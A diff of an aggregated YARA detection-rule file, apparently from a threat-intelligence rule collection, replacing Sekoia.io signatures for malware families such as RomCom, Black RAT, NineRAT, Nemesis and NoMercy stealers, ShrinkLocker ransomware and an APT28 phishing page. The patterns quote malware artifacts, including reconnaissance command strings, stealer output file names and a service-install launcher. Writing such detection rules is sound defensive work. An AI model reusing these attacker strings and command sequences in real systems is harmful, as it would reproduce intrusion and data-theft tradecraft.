-		$ = {67 00 6f 00 74 00 6f 00 26 00 70 00 5e 00 6f 00 77 00 5e 00 65 00 5e 00 72 00 73 00 5e 00 68 00 65 00 5e 00 6c 00 5e 00 6c}
+		$str01 = "JinxV2" ascii
+		$str02 = "main.main.func1" ascii
+		$str03 = "go.shape.struct" ascii
+		$str04 = ".glob..func" ascii
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and all of them
+		uint16( 0 ) == 0x5A4D and all of them and #str04 > 100 and filesize > 8MB
 }
-rule SEKOIA_Rat_Win_Atharvan
+rule SEKOIA_Launcher_Win_Romcom_Launcher : FILE
 {
 	meta:
-		description = "Detect Atharvan RAT"
+		description = "Detect the launcher of RomCom malware"
 		author = "Sekoia.io"
-		id = "61347490-d281-4892-adba-89cf6187545f"
-		date = "2023-02-23"
+		id = "e8fa8239-a763-4be2-8f34-8e112e65b35e"
+		date = "2022-11-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_atharvan.yar#L1-L15"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/launcher_win_romcom_launcher.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "fee9a5a684b3e9bd629a0e87bdf63ba0c1fc1e970ca3b7fec8d7a4f2f60a355a"
+		logic_hash = "7d94f187c3fb85cbfe961dd3b292dc1abd36a8cee7c9ff9ec08c4c1e23d38588"
 		score = 75
 		quality = 78
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {44 3a 5c 72 61 6e 67 5c 54 4f 4f 4c 5c 33 52 41 54}
+		$ = {43 3a 5c 55 73 65 72 73 5c 31 32 33 5c 73 6f 75 72 63 65 5c 72 65 70 6f 73 5c 69 6e 73 5f 61 73 69 5c 57 69 6e 33 32 5c 52 65 6c 65 61 73 65 5c 73 65 74 75 70 2e 70 64 62}
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Apt_Konni : FILE
+rule SEKOIA_Crime_Sload_Powershellarchiveexfiltrator_Strings : FILE
 {
 	meta:
-		description = "Rule based on structure offsets and file extension"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "6a20c492-e932-41bd-ac4a-01d35bfb0c49"
-		date = "2022-09-12"
+		id = "3934696a-2116-49cb-9f75-3740767ad6f3"
+		date = "2022-08-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_konni.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crime_sload_powershellarchiveexfiltrator_strings.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8f178421fd0968f4ce809054022579c7fc8dede5f6514e89966d13acb83d75d9"
+		logic_hash = "7d6234ced7e5915a5b27ce2065772c74adb5c2398a8c972421fb5ec6b1b7771f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248448,83 +248509,82 @@ rule SEKOIA_Apt_Konni : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ext_1 = ".zip" wide ascii fullword
-		$ext_2 = ".cab" wide ascii fullword
-		$ext_3 = ".rar" wide ascii fullword
-		$ext_4 = ".ini" wide ascii fullword
-		$ext_5 = ".dat" wide ascii fullword
-		$offset_structure_1 = { 8d ?? 08 02 00 00 }
-		$offset_structure_2 = { 8d ?? 10 04 00 00 }
-		$offset_structure_3 = { 8d ?? 18 06 00 00 }
-		$url = "%s/dn.php?name=%s&prefix=%s" wide
+		$ = "if ($wr1 -or $wr2){"
+		$ = "if ($zp1 -or $zp2){"
+		$ = "-join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_});"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 3MB and 3 of ( $ext_* ) and all of ( $offset_structure_* ) and $url
+		all of them and filesize < 1KB
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_6 : FILE
+
+rule SEKOIA_Backdoor_Win_Blackrat : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detect Andariel's Black RAT malware"
 		author = "Sekoia.io"
-		id = "53506a3e-b0d8-4a1e-88d9-485e829f25cb"
-		date = "2023-02-03"
+		id = "3a5a6290-6344-45ce-8929-ea5a4451840f"
+		date = "2023-09-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_6.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_blackrat.yar#L4-L33"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "38919408d2d0a9f51822302f4f821bf5776f119bf0d1b54b71b1040c7ad59da5"
+		logic_hash = "4edf1335e357ebc02e4abb51cd8d808ae39e649cf19cdb3ec667c9cf313181a9"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "c2500a6e12f22b16e221ba01952b69c92278cd05632283d8b84c55c916efe27c"
 
 	strings:
-		$ = "function ${rc4Function}(r,o){for("
-		$ = "function ${b64AndRC4Function}(r,o){var"
-		$ = "Real-Time Scanning: No threats detected"
-		$ = "Please wait while your file is being downloaded..."
+		$s1 = "I:/01___Tools/02__RAT/Black/Client_Go/Client.go"
+		$s2 = "I:/01___Tools/02__RAT/Black/Client_Go/Define.go"
+		$s3 = "I:/01___Tools/02__RAT/Black/Client_Go/Screenshot.go"
+		$x1 = "RAT/Black/Client"
 
 	condition:
-		3 of them and filesize < 2MB
+		uint16be( 0 ) == 0x4d5a and ( all of ( $s* ) or #x1 >= 3 ) or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "74c4cdc9d33fc63aee7ae9659b6f8d24" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "298948afbe85985025e176605ee21176" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e5ca54c5def3c7a950e6d4034dc86277" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "440ae899aea859458df5b6de7dbc5b34" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "98e46f76b965ffb58f6cd53ff8dc91c0" )
 }
 
-rule SEKOIA_Backdoor_Win_Sidewinder_Cobaltstrike_2022_09
+rule SEKOIA_Dropper_Win_Ninerat
 {
 	meta:
-		description = "Detect the SideWinder malware"
+		description = "NineRAT dropper"
 		author = "Sekoia.io"
-		id = "b5e8f87a-4a2c-49bb-aa98-bf3fb5056b23"
-		date = "2022-10-24"
+		id = "798e3bee-4cee-4647-abda-3c3dcc602f0a"
+		date = "2023-12-12"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_sidewinder_cobaltstrike_2022_09.yar#L4-L29"
+		reference = "https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/dropper_win_ninerat.yar#L4-L41"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f2b719170783c1bfaa4c4772e5cff73797be3056204566844c236d1857869e4c"
+		logic_hash = "00f69545c7351fba8b45e2b4d21855ba8ae94f2d10df199732665e8f3f00c1b4"
 		score = 75
 		quality = 80
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "534f5612954db99c86baa67ef51a3ad88bc21735bce7bb591afa8a4317c35433"
+		hash2 = "f91188d23b14526676706a5c9ead05c1a91ea0b9d6ac902623bc565e1c200a59"
 
 	strings:
-		$s1 = {65004e004500560045005200200047004f004e004e00410020004700490056004500200059004f0055002000550050002100}
+		$ = "\\x64\\Release\\Dropper.pdb"
+		$ = "TelegramRat\\lastest\\Dropper"
 
 	condition:
-		$s1 or pe.imphash ( ) == "b1e345b2d78e4b82617d995d18100790" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ac989507d4af352fa354560efef99ba6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "8090b29a44c750b7b21287f9639fe747" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ea8693d6bacf3e7876f717a3d8abc433" )
+		all of them or pe.imphash ( ) == "92b8e9dea06fd5719e29a510e95b92ac" or hash.md5 ( pe.rich_signature.clear_data ) == "ba1ea20fe779ef0b747e5073c0881a99" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "c0471e0a78eef692b567cd89eeaddf08" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "965dc8b7c98325ca3d3371ced8424823" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "bae1db350e313bf7bbd3b2178b20e6f6dd9b0331780099374edae5a99625bc5b" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "1abb447513b4435837029933e722b6ed92222291571a8ce0a306c9f6a335aa19" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ffbcd5bbe6c02aa5c993886811d7597f020abd6665fc82af133c5756ab72fb0a" )
 }
-rule SEKOIA_Miner_Win_Xmrig_Strings : FILE
+rule SEKOIA_Infostealer_Win_Nemesis_In_Memory : FILE
 {
 	meta:
-		description = "Detects XMRig EXE"
+		description = "Finds Nemesis Stealer samples based on specific strings, from samples without strings obsucation, or from memory"
 		author = "Sekoia.io"
-		id = "35f203aa-20cd-4235-9ead-b34be14255d5"
-		date = "2024-01-04"
+		id = "01d85bd5-ea93-44ff-b36a-9cd9eb54d634"
+		date = "2023-03-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/miner_win_xmrig_strings.yar#L1-L35"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_nemesis_in_memory.yar#L1-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "34aa0da9d3bb277927c87a3745ec9e35881682319c91141da6ff1cff7e0610d9"
+		logic_hash = "65d2dd9a10238e6d65d8992aa9cc145f73bcba9be49ed552f8b0c44723ec4c87"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248532,41 +248592,35 @@ rule SEKOIA_Miner_Win_Xmrig_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "XMRig "
-		$ = "pool_wallet"
-		$ = "IP Address currently banned"
-		$ = "rigid"
-		$ = "diff_current"
-		$ = "shares_good"
-		$ = "shares_total"
-		$ = "avg_time"
-		$ = "avg_time_ms"
-		$ = "hashes_total"
-		$ = "pool address"
-		$ = "ping time"
-		$ = "connection time"
-		$ = "daemon+wss://"
-		$ = "daemon+https://"
-		$ = "daemon+http://"
-		$ = "socks5://"
-		$ = "stratum+ssl://"
-		$ = "stratum+tcp://"
+		$str01 = "NemesisProject.Modules." ascii
+		$str02 = "~[NEMESIS INIZIALIZE]~" wide
+		$str03 = "Clip_BoardText.txt" wide
+		$str04 = "stealer_out.zip" wide
+		$str05 = "<span style=\"color:#FFFFFF\">Number of running processes:</span>" wide
+		$str06 = "<span style=\"color:#FFFFFF\">Installed FireWall: </span>" wide
+		$str07 = "~[Panel_Receiving_Data]~ Incorrect data when receiving data on the panel" wide
+		$str08 = "ProcessInfo_Log.txt" wide
+		$str09 = "Installed_Software_Log.txt" wide
+		$str10 = "Detect Data ClipBoard] - [ {DateTime.Now:MM.dd.yyyy - HH:mm:ss}]" wide
+		$str11 = "VPN/ProtonVPN_Log.txt" wide
+		$str12 = "VPN/Nord_Log.txt" wide
+		$str13 = "Steam/SteamID_Log.txt" wide
 
 	condition:
-		uint32be( 0 ) == 0x5A4D and filesize < 15MB and 7 of them
+		uint16( 0 ) == 0x5A4D and 6 of them
 }
-rule SEKOIA_Tool_Sharphoundpowershell_Strings : FILE
+rule SEKOIA_Launcher_Win_Stealthmutant_Bat_Launcher : FILE
 {
 	meta:
-		description = "Detects SharpHound Powershell"
+		description = "StealthMutant/StealthVector bat launcher"
 		author = "Sekoia.io"
-		id = "f27a0bdc-1a8c-43f9-843c-6c8506726f37"
-		date = "2022-08-11"
+		id = "7452291f-2244-469e-bb7c-5eff1ca17aa2"
+		date = "2021-08-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_sharphoundpowershell_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/launcher_win_stealthmutant_bat_launcher.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "29756acb0afd8aabac170ca8288f1dcffcb2e601c9bdba1cc7a30b8b415661f6"
+		logic_hash = "06ae4bc3ed938738dfca10c182a6a2363aa6aa70e730aefd41f6fe73c675785d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248574,101 +248628,155 @@ rule SEKOIA_Tool_Sharphoundpowershell_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "function Invoke-BloodHound"
-		$ = "$vars.Add($RealDNSName)"
-		$ = "$vars.Add($Jitter)"
-		$ = "CmdletBinding(PositionalBinding = $false)"
-		$ = ").Invoke($Null, @(,$passed))"
-		$ = "$EncodedCompressedFile ="
+		$s1 = "set \"WORK_DIR=" ascii
+		$s2 = "set \"DLL_NAME=" ascii
+		$s3 = "set \"SERVICE_NAME=" ascii
+		$s4 = "set \"DISPLAY_NAME=" ascii
+		$s5 = "set \"DESCRIPTION=" ascii
+		$start = "@echo off" ascii
+		$end = "net start \"%SERVICE_NAME%\"" ascii
 
 	condition:
-		filesize < 2MB and 4 of them
+		uint16( 0 ) != 0x5A4D and all of ( $s* ) and filesize < 2KB and $start at 0 and $end in ( filesize -30 .. filesize )
 }
-
-rule SEKOIA_Loader_Win_Doppeldridex
+rule SEKOIA_Ransomware_Win_Shrinklocker
 {
 	meta:
-		description = "Detect the DoppelDridex banking trojan using its Rich header"
+		description = "Detects files related to the ShrinkLocker ransomware"
 		author = "Sekoia.io"
-		id = "ee5111ae-ba0b-4cd3-abe6-c66324d16840"
-		date = "2021-09-28"
+		id = "93a6fbdd-ad62-456a-a1a5-b5ae3b242004"
+		date = "2024-06-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_doppeldridex.yar#L3-L33"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_shrinklocker.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4ceed302cb36b73d98070996ede64742579a261ef3ede6e1eb1723ddca32e839"
+		logic_hash = "7770b0946b9bb482f23c4ce0d753393e0d42a6fd8b31029847d74356296f0cf1"
 		score = 75
 		quality = 80
 		tags = ""
-		version = "1.1"
+		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$a = "shrinkdisk" ascii fullword
+		$b = "BitLocker" ascii fullword
+		$c = "diskpart" ascii fullword
+		$d = "disk.vbs" ascii fullword
+		$e = "strDriveLetter" ascii fullword
+		$f = "shrinkcomplate" ascii fullword
+		$g = "ADODB.Stream" ascii fullword
+		$h = "Win32_OperatingSystem" ascii fullword
+		$i = "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server" ascii fullword
+		$j = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" ascii fullword
+		$k = "HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE" ascii fullword
+
 	condition:
-		pe.rich_signature.toolid( 122 , 50727 ) and pe.rich_signature.toolid ( 1 , 0 ) and pe.rich_signature.toolid ( 222 , 40629 ) and pe.rich_signature.toolid ( 131 , 30729 ) and pe.rich_signature.toolid ( 220 , 31101 ) and pe.rich_signature.toolid ( 202 , 60315 ) and pe.rich_signature.toolid ( 202 , 50727 ) and pe.rich_signature.toolid ( 261 , 23506 ) and pe.rich_signature.toolid ( 149 , 21022 ) and pe.rich_signature.toolid ( 261 , 23918 ) and pe.rich_signature.toolid ( 219 , 21005 ) and pe.rich_signature.toolid ( 171 , 30319 ) and pe.rich_signature.toolid ( 225 , 21005 ) and pe.rich_signature.toolid ( 221 , 21005 ) and pe.rich_signature.toolid ( 259 , 24210 ) and pe.rich_signature.toolid ( 258 , 24213 ) and pe.rich_signature.toolid ( 158 , 40219 ) and pe.rich_signature.toolid ( 145 , 21022 ) and pe.rich_signature.toolid ( 207 , 60315 ) and pe.rich_signature.toolid ( 256 , 23026 )
+		9 of them
 }
-
-rule SEKOIA_Apt_Badmagic_Modules
+rule SEKOIA_Nomercy : FILE
 {
 	meta:
-		description = "Detect the modules used by the CloudWizard framework"
+		description = "Detect NoMercy sample version up to 1.1.0"
 		author = "Sekoia.io"
-		id = "e4f1f706-4a46-4a09-b598-e4e8d80f2c4b"
-		date = "2023-05-25"
+		id = "2591f74b-8ab8-45ef-ba64-62a93df305c1"
+		date = "2022-07-11"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_modules.yar#L3-L20"
+		reference = "https://blog.cyble.com/2022/07/07/nomercy-stealer-adding-new-features/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/nomercy.yar#L1-L61"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "no hash has been found on 2023-05-25 to test the rule"
-		logic_hash = "6f8bc35dbf0fd4083a8d93b04b55b2e0e215cd23350243ddd7ba9dd4745c4496"
-		score = 50
-		quality = 80
-		tags = ""
+		logic_hash = "175bc58f1b34bb60f6cacc15747e944cbbdd58fe287ff46abed969eaa39870db"
+		score = 75
+		quality = 78
+		tags = "FILE"
 		version = "1.0"
+		hash1 = "9ecc76d4cda47a93681ddbb67b642c2e1f303ab834160ab94b79b47381e23a65"
+		hash2 = "557acce8b787aba87c8eeb939438b52c5ca953f28ad680a7faeb2b3046d3fda0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$debug1 = "Posted uid and version" wide ascii
+		$debug2 = "Posted cli info to server" wide ascii
+		$debug3 = "Posted other info to server" wide ascii
+		$debug4 = "Sending screenshot..." wide ascii
+		$debug5 = "Sent screenshot" wide ascii
+		$debug6 = "Listening to Microphone..." wide ascii
+		$debug7 = "Collecting other info..." wide ascii
+		$url1 = "/a?uid=" wide ascii
+		$url2 = "/c?uid=" wide ascii
+		$url3 = "/d?uid=" wide ascii
+		$url4 = "/e?uid=" wide ascii
+		$url5 = "/b?sysinfoother=" wide ascii
+		$url6 = "/b?sysinfocli=" wide ascii
+		$info1 = "PUBLIC IP:" wide ascii
+		$info2 = "HWID:" wide ascii
+		$info3 = "RAM:" wide ascii
+		$info4 = "GPU:" wide ascii
+		$info5 = "MEDIA ACCESS CONTROL ADDRESS:" wide ascii
+		$info6 = "PRIVATE IP:" wide ascii
+		$info7 = "OS VERSION:" wide ascii
+		$info8 = "ANTIVIRUS:" wide ascii
+		$info9 = "KEYBOARD LANGUAGE:" wide ascii
+		$info10 = "CLIPBOARD: {0}{1}{2}" wide ascii
+		$info11 = "RUNNING PROCESSES:" wide ascii
+		$info12 = "WINDOW TITLE:" wide ascii
+		$cmd1 = "/c whoami /all" wide ascii
+		$cmd2 = "/c whoami" wide ascii
+		$cmd3 = "/c arp -a" wide ascii
+		$cmd4 = "/c ipconfig /all" wide ascii
+		$cmd5 = "/c net view /all" wide ascii
+		$cmd6 = "/c net share" wide ascii
+		$cmd7 = "/c route print" wide ascii
+		$cmd8 = "/c netstat -nao" wide ascii
+		$cmd9 = "/c net localgroup" wide ascii
+		$cmd10 = "/c systeminfo" wide ascii
+		$inv1 = "http://api.ipify.org" wide ascii
+		$inv2 = "NoMercy" wide ascii
+
 	condition:
-		pe.DLL and pe.exports ( "Start" ) and pe.exports ( "Stop" ) and pe.exports ( "Whoami" ) and pe.exports ( "GetResult" ) and pe.exports ( "GetSettings" )
+		uint16be( 0 ) == 0x4d5a and 3 of ( $debug* ) and 8 of ( $info* ) and 2 of ( $url* ) and 6 of ( $cmd* ) and 1 of ( $inv* ) and filesize > 700KB and filesize < 3000KB
 }
-rule SEKOIA_Spyware_And_Bahamut
+rule SEKOIA_Downloader_Kimsuky_Lnk
 {
 	meta:
-		description = "Detect Bahamut's spyware based on common information gathering function names"
+		description = "Detect Kimsuky LNK"
 		author = "Sekoia.io"
-		id = "d416997e-baf1-412c-bf39-905a6e19b65e"
-		date = "2022-11-23"
+		id = "3831d115-7874-4bc9-aeb4-d2cb9bc2b5c9"
+		date = "2024-07-16"
 		modified = "2024-12-19"
-		reference = "https://www.welivesecurity.com/2022/11/23/bahamut-cybermercenary-group-targets-android-users-fake-vpn-apps/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/spyware_and_bahamut.yar#L1-L20"
+		reference = "https://blogs.jpcert.or.jp/en/2024/07/attack-activities-by-kimsuky-targeting-japanese-organizations.html"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_kimsuky_lnk.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5f44c938fed9b32eaf183be979a67e0c7fde409e72875359105ad7ffb393893d"
+		logic_hash = "3512c8c21203a015b316c2a993db1a8c10420df06ea97d84a6e350550a628230"
 		score = 75
 		quality = 80
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "c51dc2132c830c560aaeae4bf48e5f0d28c84b36d27840b5c2ba170d87f4afa5"
-		hash2 = "d7e2cf642b236dba9ba0cbe5a9dc28baf22477973d5ce163e21ec40f5f26e078"
+		hash1 = "3065b8e4bb91b4229d1cea671e8959da8be2e7482067e1dd03519c882738045e"
+		hash2 = "d912f49d24792aa7197509f76e2097ac3858cde23199e1b40f2516948d39c589"
+		hash3 = "e936445935c4a636614f7113e4121695a5f3e4a6c137b7cdcceb6f629aa957c4"
+		hash4 = "fe156159a26f8b7c140db61dd8b136e1c8103a800748fe9b70a3a3fdf179d3c3"
 
 	strings:
-		$ = "FbDao"
-		$ = "SignalDao"
-		$ = "conionDao"
+		$ = "AType: Text Document" wide
+		$ = "Size: 5.23 KB" wide
+		$ = "Date modified: 01/02/2020 11:23" wide
 
 	condition:
 		all of them
 }
-rule SEKOIA_Bot_Lin_Lucifer_Strings : FILE
+rule SEKOIA_Apt_Apt28_Document_Phishing_Webpage : FILE
 {
 	meta:
-		description = "Catch Lucifer DDoS - lin version - malware based on strings"
+		description = "Detects APT28 document phishing webpage"
 		author = "Sekoia.io"
-		id = "c341b6d0-bc22-4a85-aebb-ed323487f524"
-		date = "2024-09-24"
+		id = "585a8e23-c302-41d3-938f-eda60c82ef28"
+		date = "2024-04-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/bot_lin_lucifer_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt28_document_phishing_webpage.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "23276c627d27f36c1ec15b1779835b921652a8fcff898041f1920902262faf41"
+		logic_hash = "b64888c1d8568cf9d8f4dfcd2e18093db8635966d88abaa368dc46a1e4453782"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248676,58 +248784,60 @@ rule SEKOIA_Bot_Lin_Lucifer_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "DealwithDDoS" ascii
-		$s2 = "DecryptData" ascii
-		$s3 = "They say I'm rude. I'm not rude at all, but I still want to say, fuck your mother" ascii
-		$s4 = "stratum+tcp://" ascii
-		$s5 = "gethostip" ascii
-		$s6 = "GetmyName" ascii
+		$ = "webhook.site"
+		$ = "document.createElement('img')"
+		$ = "brightness(15%) blur(7.0px)"
+		$ = "This document is not available from mobile devices."
+		$ = "Capture2.PNG"
+		$ = ">CLICK TO VIEW DOCUMENT<"
+		$ = "window.location.href = 's"
+		$ = ".oast."
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		4 of them and filesize < 20KB
 }
-rule SEKOIA_Backdoor_Mul_Supershell_Client : FILE
+rule SEKOIA_Guloader_Unpacker : FILE
 {
 	meta:
-		description = "Detect the Supershell client (unpacked) by looking for github references"
+		description = "GuLoader Unpacker"
 		author = "Sekoia.io"
-		id = "3498ca9e-a165-4dda-bc15-2e5d6d43d9c1"
-		date = "2024-04-25"
+		id = "dee4cad4-e3b4-4a12-860b-ff750b119fa8"
+		date = "2024-02-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_mul_supershell_client.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/guloader_unpacker.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "93490f4a16fb7dcde671b82e3187341abf4fc95e965219233ca7689f3cd3855f"
+		logic_hash = "6be9d7fa829480466aef2a7e78a7dadfac92f7774ab3374254305040c105496f"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "a42906f8b392089fa1fe3ea264f6cb549ce5437b5ea253d9e1b8dd94bf115dad"
-		hash2 = "d97b41e8cd6b63cd55c9a4f99ccadf5a9141088319bc9eb467d96e54080f3c85"
-		hash3 = "2b54d1c064892a22f48b5742ba6da55bf62b73e5b1e0649e8b7880b286498735"
-		hash4 = "0dedab2ef8d44f9beef782a29dd8f628dd0218b90f23f729b315660437019ccd"
-		hash5 = "2484de7944889d784b8229f4fd756d3930e55c91654921019db4437877e30ab7"
 
 	strings:
-		$ = "github.com/NHAS/reverse_ssh/internal/client/"
-		$ = "golang.org"
+		$p1 = "([Parameter(Position = 0)] [Type[]] $" base64
+		$p2 = "+=2){" base64
+		$p3 = "}else {" base64
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and all of them
+		$p1 in ( filesize -30000 .. filesize ) and $p2 in ( filesize -30000 .. filesize ) and $p3 in ( filesize -30000 .. filesize ) and filesize > 300KB
 }
-rule SEKOIA_Loader_Win_Red0044_Powershell_May24 : FILE
+rule SEKOIA_Killfloor_Avkiller_Strings : FILE
 {
 	meta:
-		description = "Finds PowerShell scripts used in a malvertising campaign to deliver NetSupport RAT"
+		description = "Kill-Floor strings"
 		author = "Sekoia.io"
-		id = "ba3454b4-31cf-458d-8d78-c5cc5fa348ff"
-		date = "2024-05-03"
+		id = "ae6908c3-27d4-4d2c-af21-a9548dfcd487"
+		date = "2024-10-29"
 		modified = "2024-12-19"
-		reference = "https://twitter.com/crep1x/status/1786150734121120075"
